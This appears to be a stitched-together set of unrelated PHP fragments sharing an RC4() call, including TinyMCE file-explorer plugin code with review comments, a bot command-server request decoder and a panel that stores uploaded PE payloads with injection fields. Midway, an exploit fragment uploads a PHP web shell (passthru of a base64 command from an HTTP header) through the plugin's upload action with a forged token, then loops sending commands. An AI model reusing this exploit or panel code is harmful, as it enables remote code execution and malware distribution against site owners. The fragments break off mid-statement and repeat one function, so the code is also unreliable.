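/**
 * Echo the folder tree below $dir as nested <div><ul> markup, recursing into every subfolder.
 *
 * Reads the globals $SESSION ("hidden_folder", "hidden_subfolder", "dir", "show_chmod") and
 * $GET2, and sets $SESSION["folder"] when the entry whose path equals $SESSION["dir"] is reached.
 *
 * Folder names returned by GetFolders() are HTML-escaped before they are echoed as link text,
 * so a directory name containing markup characters is displayed literally instead of being
 * interpreted by the browser.
 *
 * @param string $dir_root Passed to GetChmod() and handed unchanged to each recursive call.
 * @param string $dir      Directory whose subfolders are listed; entries become "$dir$name/".
 * @param int    $depth    Nesting level; values >= 1 use the sub-folder hidden list and wrapper.
 * @param mixed  $treemenu Copied into the "treemenu" parameter of each folder link.
 * @return void
 */
function ShowSubFolders($dir_root, $dir, $depth, $treemenu)
{
    global $SESSION;
    global $GET2;

    $isSubLevel = $depth >= 1;

    // Top level and nested levels each have their own comma-separated list of hidden names.
    $hiddenKey = $isSubLevel ? "hidden_subfolder" : "hidden_folder";
    $folders = GetFolders($dir, explode(",", $SESSION[$hiddenKey]));

    $total = count($folders);
    if ($total == 0) {
        return;
    }

    echo $isSubLevel ? "<div class=\"sub_tree_menu\"><ul>" : "<div><ul>";

    for ($i = 0; $i < $total; $i++) {
        $name = $folders[$i];
        $path = $dir . $name . "/";

        if ($SESSION["dir"] == $path) {
            echo "<li><a id=\"active\" href=\"javascript:;\">";
            $SESSION["folder"] = $name;
        } else {
            // The link target is a hex-encoded RC4() result, so it contains only [0-9a-f]
            // and is safe inside the quoted onclick attribute.
            // NOTE(review): $path is concatenated into the query string without URL-encoding;
            // a folder name containing '&' or '=' would change the parameters if the receiver
            // splits this string with parse_str() - confirm against the consumer.
            // NOTE(review): RC4() is called with the data only; the key is not visible here,
            // and nothing in this block adds an integrity check to the token.
            $token = bin2hex(RC4("id=1&treemenu=" . $treemenu . "&dir=" . $path . "&" . $GET2));
            echo "<li><a href=\"javascript:;\" onclick=\"SMExplorer_OpenFolder('" . $token . "'); if (window.event){ window.event.returnValue = false; }\">";
        }

        // Escape the name for HTML text context. No charset argument is passed, so PHP's
        // default_charset applies; ENT_SUBSTITUTE keeps a name with invalid byte sequences
        // from collapsing to an empty string.
        $label = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE);
        echo "<img style=\"margin:0px; margin-left:4px;\" src=\"img/icon_tree_16x16.png\" border=\"0\" /><img src=\"img/icon_folder_16x16.png\" border=\"0\" />" . $label;

        if ($SESSION["show_chmod"] == 1) {
            // NOTE(review): the value shown is GetChmod($dir_root) for every entry, not the
            // mode of the listed folder - confirm this is intended.
            echo "<span style=\"margin-left:3px; font-size:7pt; color:#c4d3f6; font-weight:normal;\">[" . GetChmod($dir_root) . "]</span>";
        }
        echo "</a></li>";

        // Show the subfolders of this entry.
        ShowSubFolders($dir_root, $path, $depth + 1, $treemenu);
    }

    echo "</ul></div>";
}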
function GetServerData() { global $bot_id, $data_type, $raw_data; //if (defined('D_DEBUG')) $str = $_GET['str']; else $str = file_get_contents('php://input'); if (!$str) { if (defined('D_DEBUG')) { logerror("Error: E1"); } else { error404(); } } //if (!defined('D_DEBUG')) $str = RC4($str, $_SERVER['HTTP_HOST']); bdecodestr($str, $bot_id, $data_type, $raw_data); if (defined('D_DEBUG')) { logerror($bot_id . " | " . $data_type . " | " . strlen($raw_data)); } if (!isset($bot_id) || empty($bot_id) || !isset($data_type) || empty($data_type)) { if (defined('D_DEBUG')) { logerror("Error: E2"); } else { error404(); } } }
/**
 * Read the raw request body, pass it through RC4() with the request's Host header as the
 * second argument, and let bdecodestr() fill the globals $bot_id, $data_type and $raw_data.
 *
 * Analyst notes:
 * - The value used as the RC4 argument, $_SERVER['HTTP_HOST'], is sent in clear text with
 *   every HTTP request, so the transform obscures the body but keeps nothing secret from
 *   anyone who can observe the request.
 * - No integrity or authenticity check on the body is visible in this function; the only
 *   validation is that $bot_id and $data_type are non-empty after decoding.
 * - NOTE(review): whether error404() ends the request is not visible here. If it returns,
 *   execution continues past both checks.
 *
 * @return void
 */
function GetServerData()
{
    global $bot_id, $data_type, $raw_data;

    $body = file_get_contents('php://input');
    if (!$body) {
        debug("Error: E1");
        error404();
    }

    $decoded = RC4($body, $_SERVER['HTTP_HOST']);
    bdecodestr($decoded, $bot_id, $data_type, $raw_data);
    debug($bot_id . " | " . $data_type . " | " . strlen($raw_data));

    // empty() already covers the unset case, so one call per field is enough.
    if (empty($bot_id) || empty($data_type)) {
        debug("Error: E2");
        error404();
    }
}
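<?php
// Request bootstrap: decode the "get" token into $QUERY, normalise the configured paths,
// and seed $SESSION with its defaults.
//
// Security note: every value that ends up in $QUERY is client-supplied. The token is hex
// text that is passed through RC4() (called with the data only; the key is not visible in
// this block) and then split with parse_str(). No MAC or signature is verified here, so
// successful decoding says nothing about who produced the token. Code that consumes
// $QUERY must validate each parameter against server-side policy rather than trust it.

// Initialisation
$SESSION = array();
$QUERY = array();

// Decrypt the query string. Anything that is not a non-empty hex string is rejected before
// it reaches pack(): an array value (?get[]=...) or stray characters would otherwise raise
// a warning or a TypeError, depending on the PHP version.
if (!isset($_GET["get"]) || !is_string($_GET["get"]) || !preg_match('/\A[0-9a-fA-F]+\z/', $_GET["get"])) {
    include "error.php";
    die;
}
parse_str(RC4(pack("H*", $_GET["get"])), $QUERY);

// Check that the query string is complete.
if (!isset($QUERY["id"]) || !isset($QUERY["check_session_variable"])) {
    include "error.php";
    die;
}

// Normalise the directory path: a non-empty value gets a leading and a trailing slash.
if ($CONFIG["directory"] != "" && $CONFIG["directory"][0] != "/") {
    $CONFIG["directory"] = "/" . $CONFIG["directory"];
}
if ($CONFIG["directory"] != "" && substr($CONFIG["directory"], -1) != "/") {
    $CONFIG["directory"] = $CONFIG["directory"] . "/";
}

// Normalise the server path: strip one trailing slash.
if ($CONFIG["server"] != "" && substr($CONFIG["server"], -1) == "/") {
    $CONFIG["server"] = substr($CONFIG["server"], 0, -1);
}

// Initialisation of the session defaults
$SESSION["id"] = "1";
$SESSION["back"] = "0";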
<form style="padding:10px;" name="form_upload" action="" method="post" enctype="multipart/form-data"> <div style="margin-bottom:2px;"><b><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smexplorer.upload_label_1', '?'));</script>:</b></div> <div><input id="upload_input_1" style="margin-bottom:8px;" type="file" name="input1" size="64" onchange="SMExplorer_Upload_ShowFileName();"></div> <div style="margin-bottom:2px;"><b><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smexplorer.upload_label_2', '?'));</script>:</b></div> <div><input id="upload_edit_1" style="width:90%;" type="text" name="edit1" maxlength="50"><input id="upload_edit_2" style="width:40px; border-left:0px; font-weight:bold; background-color:#f6f9fb;" type="text" name="edit2" readonly></div> <div style="margin-top:12px; margin-bottom:57px;"> <script language="javascript" type="text/javascript"> /* <![CDATA[ */ var jSMB_U1 = new jSMButton(); jSMB_U1.SetStyle('float:left;'); jSMB_U1.Paint('jSMB_U1', tinyMCEPopup.getLang('smexplorer.upload_button_1', '?'), 'SMExplorer_Upload_Save(\'<?php echo bin2hex(RC4("id=2&" . $GET)); ?> \');'); var jSMB_U2 = new jSMButton(); jSMB_U2.SetStyle('float:left; margin-left:20px;'); jSMB_U2.Paint('jSMB_U2', tinyMCEPopup.getLang('smexplorer.upload_button_2', '?'), 'SMExplorer_Upload_Close();'); /* ]]> */ </script> </div> <div id="upload_info"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td><b><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smexplorer.upload_info_1', '?'));</script>:</b></td> <td><?php if ($SESSION["upload_filetype"] != "") { echo str_replace(',', ', ', $SESSION["upload_filetype"]); } else {
/**
 * Compute the U value.
 *
 * Returns RC4() applied to the object's encryption key and its padding string, in that
 * argument order.
 *
 * NOTE(review): the names suggest the user-password ("U") entry of an RC4-based document
 * encryption scheme - confirm against the enclosing class. RC4 is a legacy cipher; a value
 * derived this way should not be relied on for strong confidentiality.
 *
 * @return mixed whatever RC4() returns for ($this->encryption_key, $this->padding)
 */
function _Uvalue()
{
    $key = $this->encryption_key;
    $pad = $this->padding;

    return RC4($key, $pad);
}
if ($CONFIG["show_preview"] == 1) { $a = array(); $a = GetNewImageSize($SESSION["dir"] . $FILES[$i], 200); // Bilddatei mit Thumbnail-Anzeige $icon = "<div id=\"th" . $i . "\" class=\"jsmpreview\"></div><img style=\"cursor:pointer;\" src=\"img/icon_image_16x16.png\" border=\"0\" onmouseover=\"jSMP.Show(\\'th" . $i . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $a["width"] . "\\', \\'" . $a["height"] . "\\');\" onmouseout=\"jSMP.Close(\\'th" . $i . "\\');\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />"; unset($a); } else { // Bilddatei ohne Thumbnail-Anzeige $icon = "<img style=\"cursor:pointer;\" src=\"img/icon_image_16x16.png\" border=\"0\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />"; } } else { // Keine Bilddatei $icon = "<img style=\"cursor:pointer;\" src=\"img/icon_file_16x16.png\" border=\"0\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />"; } if ($SESSION["show_file_menu"] == 1) { echo "jSMT.AddData(Array('<input id=\"td_checkbox" . $i . "\" name=\"td_checkbox" . $i . "\" class=\"checkbox\" type=\"checkbox\" value=\"0\" onclick=\"SMExplorer_Check(" . count($FILES) . ");\" />', '" . $icon . "', '<input id=\"fn_input" . $i . "\" name=\"fn_input" . $i . "\" class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$i] . "\" title=\"" . $FILES[$i] . "\" onclick=\"SMExplorer_InputClick(this, " . $CONFIG["rename_file_ext"] . ");\" onblur=\"SMExplorer_InputBlur(this, \\'" . $FILES[$i] . "\\');\" onkeypress=\"SMExplorer_InputEnter(event, this, \\'" . $FILES[$i] . "\\', \\'" . bin2hex(RC4("id=1&" . $GET)) . "\\');\">', '<img id=\"i1" . $i . 
"\" style=\"cursor:pointer;\" src=\"img/icon_insert_16x16.png\" border=\"0\" title=\"\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />', '<img id=\"i3" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_show_16x16.png\" border=\"0\" title=\"\" onclick=\"SMExplorer_View_Show(\\'" . $SESSION["dir"] . $FILES[$i] . "\\');\" />', '<img id=\"i2" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_delete_16x16.png\" border=\"0\" title=\"\" onclick=\"SMExplorer_DeleteFile(\\'" . bin2hex(RC4("id=1&" . $GET)) . "\\', \\'" . $FILES[$i] . "\\');\" />', '" . number_format(@filesize(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i]) / 1024, 2, ",", ".") . " KB', '" . date(GetDateFormat() . ' H:i', @filemtime(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i])) . "'), Array('width:18px; text-align:center;', 'width:18px; text-align:center;', '', 'width:16px; text-align:center;', 'width:16px; text-align:center;', 'width:16px; text-align:center;', 'width:102px; text-align:right;', 'width:122px; text-align:center;'));"; } else { echo "jSMT.AddData(Array('" . $icon . "', '<input id=\"fn_input" . $i . "\" name=\"fn_input" . $i . "\" class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$i] . "\" title=\"" . $FILES[$i] . "\" readonly=\"1\">', '" . number_format(@filesize(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i]) / 1024, 2, ",", ".") . " KB', '" . date(GetDateFormat() . ' H:i', @filemtime(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i])) . "'), Array('width:18px; text-align:center;', '', 'width:16px; text-align:center;', 'width:102px; text-align:right;', 'width:122px; text-align:center;'));"; } } ?> // Tabelle zeichnen jSMT.Paint(); <?php // Hinweis hinzufügen for ($i = 0; $i < count($FILES); $i++) { echo "document.getElementById('i1" . $i . "').title = tinyMCEPopup.getLang('smexplorer.file_menu_hint_1', '?'); document.getElementById('i2" . $i . 
"').title = tinyMCEPopup.getLang('smexplorer.file_menu_hint_2', '?'); document.getElementById('i3" . $i . "').title = tinyMCEPopup.getLang('smexplorer.file_menu_hint_3', '?');"; } ?>
<ul>
<?php
// Toolbar entry "m12": navigates to index.php with a hex-encoded RC4() token built from
// "id=1&" plus the current $GET string, followed by a separator image.
// The token is bin2hex() output, so it contains only [0-9a-f] inside the onclick attribute.
// NOTE(review): RC4() is called with the data only; the token is obfuscated, not signed,
// so the receiving page has to validate the decoded parameters itself.
echo "<li><a id=\"m12\" href=\"javascript:;\" title=\"\" onclick=\"window.location.href='index.php?get="
    . bin2hex(RC4("id=1&" . $GET))
    . "'; if (window.event){ window.event.returnValue = false; }\"><img src=\"img/icon_image_24x24.png\" border=\"0\" /></a></li>"
    . "<li><img class=\"separator\" src=\"img/icon_separator.png\" border=\"0\" /></li>";
?>
</ul>
die; } $host = $argv[1]; $path = $argv[2]; $packet = "GET {$path} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m); $sid = $m[1]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n"; $payload .= "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n"; $payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n"; $payload .= "--o0oOo0o--\r\n"; $get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh")); $packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: PHPSESSID={$sid}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; if (preg_match("/Error/", http_send($host, $packet))) { die("\n[-] Upload failed!\n"); } $packet = "GET {$path}cache/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while (1) {
if (($SESSION["page"] + 1) * $SESSION["thumbnails_perpage"] < count($FILES)) { echo "<li><a id=\"m4\" href=\"javascript:;\" title=\"\" onclick=\"window.location.href='index.php?get=" . bin2hex(RC4("id=1&page=" . ($SESSION["page"] + 1) . "&" . $GET)) . "'; if (window.event){ window.event.returnValue = false; }\"><img src=\"img/icon_forward_24x24.png\" border=\"0\" /></a></li>"; } else { echo "<li><a id=\"m4\" href=\"javascript:;\" title=\"\"><img src=\"img/icon_forward_2_24x24.png\" border=\"0\" /></a></li>"; } } ?> <li><img class="separator" src="img/icon_separator.png" border="0" /></li> <li><a id="m5" href="javascript:;" title="" onclick="SMImage_PageReload('<?php echo bin2hex(RC4("id=1&" . $GET)); ?> '); if (window.event){ window.event.returnValue = false; }"><img src="img/icon_reload_24x24.png" border="0" /></a></li> <li><img class="separator" src="img/icon_separator.png" border="0" /></li> <li><select class="select" id="Select1" name="Select1" size="1" onChange="location.href=this.options[this.selectedIndex].value;"><option <?php if ($SESSION["show_thumbnail"] == 1) { echo "selected"; } ?> value="index.php?get=<?php echo bin2hex(RC4("id=1&show_thumbnail=1&" . str_replace("&show_thumbnail=0", "", $GET))); ?> "><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smimage.menu_view_select_1', '?'));</script></option><option <?php if ($SESSION["show_thumbnail"] == 0) { echo "selected"; } ?> value="index.php?get=<?php echo bin2hex(RC4("id=1&show_thumbnail=0&" . str_replace("&show_thumbnail=1", "", $GET))); ?> "><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smimage.menu_view_select_2', '?'));</script></option></select></li> </ul>
if (isset($_POST['fAdd'])) { $newname = './files/' . randstr(30); $ctx = file_get_contents($_FILES['fFile']['tmp_name']); $arr = unpack('v1doshdr/@60/Llfa_new/C*bytes', $ctx); if ($arr['doshdr'] == 23117) { $fileheader[0] = $arr['bytes' . ($arr['lfa_new'] - 59)]; $fileheader[1] = $arr['bytes' . ($arr['lfa_new'] - 58)]; if ($fileheader[0] == 76 && $fileheader[1] == 1) { $PEarch = "X86"; } else { if ($fileheader[0] == 100 && $fileheader[1] == 134) { $PEarch = "X64"; } } if (!empty($PEarch) && ($fh = fopen($newname, "w+"))) { if (fwrite($fh, RC4($ctx, explode('/', $newname)[2]))) { $file = array('fArch' => $PEarch, 'fName' => $_POST['fName'], 'fVer' => $_POST['fVer'], 'fInject' => $_POST['fInject'], 'fFilePath' => $newname, 'fDate' => date('Y-m-d H:i:s', strtotime('now')), 'fConnectedWith' => $_POST['tConnectedWith'], 'fArgs' => $_POST['fArgs']); if ($db->insert('files', $file)) { metaRefresh('?act=files'); } } else { echo "Error while write file"; } fclose($fh); } else { echo "Error while open file or file is not valid PE image."; } unset($arr); } else { echo "Not a PE file."; }
// Icon mit Thumbnail-Anzeige bei "onmouseover" $a = array(); $a = GetNewImageSize($IMAGE_PATH_2 . $FILES[$j], 200); echo "<td style=\"width:18px; text-align:center;\"><div id=\"smpreview" . $j . "\" class=\"smpreview\"></div><img style=\"cursor:pointer;\" src=\"img/icon_image_16x16.png\" border=\"0\" onmouseover=\"SMP.Show('smpreview" . $j . "', '" . $IMAGE_PATH_2 . $FILES[$j] . "', '" . $a["width"] . "', '" . $a["height"] . "');\" onmouseout=\"SMP.Close('smpreview" . $j . "');\" onclick=\"SMImage_Insert('" . $SESSION["server"] . "', '" . $IMAGE_PATH_2 . $FILES[$j] . "', '" . Image_GetWidth($IMAGE_PATH . $FILES[$j]) . "', '" . Image_GetHeight($IMAGE_PATH . $FILES[$j]) . "', '" . $CONFIG["style"] . "');\" /></td>"; unset($a); // Dateiname if ($SESSION["show_image_menu"] == 1) { echo "<td><input class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$j] . "\" title=\"" . $FILES[$j] . "\" onclick=\"SMImage_InputFileClick(this);\" onblur=\"SMImage_InputFileBlur(this, '" . $FILES[$j] . "');\" onkeypress=\"SMImage_InputFileEnter(event, this, '" . $FILES[$j] . "', '" . bin2hex(RC4("id=1&" . $GET)) . "')\"></td>"; } else { echo "<td><input class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$j] . "\" title=\"" . $FILES[$j] . "\" readonly=\"1\"></td>"; } // Icon "Bild einfügen" echo "<td style=\"width:16px; text-align:center;\"><img id=\"i1" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_insert_16x16.png\" border=\"0\" title=\"\" onclick=\"SMImage_Insert('" . $SESSION["server"] . "', '" . $IMAGE_PATH_2 . $FILES[$j] . "', '" . Image_GetWidth($IMAGE_PATH . $FILES[$j]) . "', '" . Image_GetHeight($IMAGE_PATH . $FILES[$j]) . "', '" . $CONFIG["style"] . "');\" /></td>"; // Icon "Bilddatei löschen" if ($SESSION["show_image_menu"] == 1) { echo "<td style=\"width:16px; text-align:center;\"><img id=\"i2" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_delete_16x16.png\" border=\"0\" title=\"\" onclick=\"SMImage_DeleteImage('" . 
bin2hex(RC4("id=1&" . $GET)) . "', '" . $FILES[$j] . "');\" /></td>"; } // Dateigröße echo "<td style=\"width:102px; text-align:right;\">" . number_format(@filesize($IMAGE_PATH . $FILES[$j]) / 1024, 2, ",", ".") . " KB</td>"; // Bildgröße echo "<td style=\"width:102px; text-align:right;\">" . Image_GetWidth($IMAGE_PATH . $FILES[$j]) . " x " . Image_GetHeight($IMAGE_PATH . $FILES[$j]) . "</td>"; // Datum echo "<td style=\"width:122px; text-align:center;\">" . date(GetDateFormat() . ' H:i', @filemtime($IMAGE_PATH . $FILES[$j])) . "</td>"; // ScrollBar echo "<td style=\"width:10px;\"> </td>"; echo "</tr>"; // Hinweis hinzufügen echo "<script language=\"javascript\" type=\"text/javascript\">document.getElementById('i1" . $i . "').title = tinyMCEPopup.getLang('smimage.image_menu_hint_1', '?'); document.getElementById('i2" . $i . "').title = tinyMCEPopup.getLang('smimage.image_menu_hint_2', '?');</script>"; $i++; } echo "</table></div>";
/**
 * Decode a transport-encoded string: raw-URL-decode it, base64-decode the result, then
 * pass it through RC4() with the KEY constant.
 *
 * Security notes:
 * - base64_decode() runs in its default non-strict mode, so characters outside the base64
 *   alphabet are silently discarded rather than rejected.
 * - No integrity check is performed. Any input yields some output, so callers must treat
 *   the returned string as untrusted data and validate it before use.
 * - KEY is a constant defined elsewhere; a fixed key shared by all messages gives no
 *   per-message protection with a stream cipher such as RC4.
 *
 * @param string $str URL-encoded, base64-encoded input
 * @return mixed the value returned by RC4()
 */
function str_decrypt($str)
{
    return RC4(base64_decode(rawurldecode($str)), KEY);
}
} if (!isset($_GET['add'])) { $files = $db->query('SELECT * FROM `files`')->fetchAllAssoc(); echo "<table cellpadding='3' cellspacing='3' width='100%' style=''><tr><td width='100%'>"; echo "<table cellpadding='3' cellspacing='0' width='100%' class='light_table box' rules='all'>\r\n <tr><th>Num</th><th>Name</th><th>Version</th><th>Added</th><th>Path</th><th>Action</th></tr>"; $count = 0; foreach ($files as $file) { $color = $count % 2 ? "#d3e7f0" : "#ebf4f8"; echo "<tr bgcolor='{$color}' onmouseover=\"this.style.background='#ffffff'\" onmouseout=\"this.style.background='{$color}'\">\r\n <td align='center'><b>{$file['fId']}</b></td>\r\n <td align='center'>{$file['fName']}</td>\r\n <td align='center'>{$file['fVer']}</td>\r\n <td align='center'>{$file['fDate']}</td>\r\n <td align='center'>{$file['fFilePath']}</td>\r\n <td align='center'><a href='?act=files&del=" . $file['fId'] . "'>Delete</a></td>\r\n </tr>"; $count++; } } else { echo "<form action='?act=files&add' method='post' enctype='multipart/form-data'>\r\n <table cellpadding='3' cellspacing='3' width='100%'>\r\n <tr>\r\n <td class='td_col_zag' width='30%'>Name</td>\r\n <td class='td_col_list' width='70%'>\r\n <input name='fName' type='text' value=''>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td class='td_col_zag' width='30%'>Version</td>\r\n <td class='td_col_list' width='70%'>\r\n <input name='fVer' type='text' value=''>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td class='td_col_zag' width='30%'>File</td>\r\n <td class='td_col_list' width='70%'>\r\n <input type='file' name='fFile'>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td> </td>\r\n <td><input type='submit' value='Add' name='fAdd'></td>\r\n </tr>\r\n </table>\r\n </form>"; if (isset($_POST['fAdd'])) { $newname = './files/' . 
randstr(30); $ctx = file_get_contents($_FILES['fFile']['tmp_name']); if ($fh = fopen($newname, "w+")) { if (fwrite($fh, RC4($ctx, "1"))) { $file = array('fName' => $_POST['fName'], 'fVer' => $_POST['fVer'], 'fInject' => "", 'fFilePath' => $newname, 'fDate' => date('Y-m-d H:i:s', strtotime('now'))); if ($db->insert('files', $file)) { metaRefresh('?act=files'); } } else { echo "Error while write file"; } fclose($fh); } else { echo "Error while open file"; } } }